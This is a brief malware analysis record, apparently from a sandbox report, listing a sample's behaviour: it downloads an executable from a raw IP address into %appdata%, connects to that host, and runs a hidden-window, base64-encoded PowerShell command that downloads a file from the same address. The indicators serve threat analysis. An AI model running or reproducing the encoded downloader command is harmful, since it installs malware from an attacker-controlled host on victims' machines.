Technical Information
- http://89.248.170.218/~yahoo/csrsv.exe as %appdata%\csrsv.exe
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1876
- %TEMP%\825338.cvr
- '89.##8.170.218':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' powershell -window hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADkALgAyADQAOA...' (with hidden window)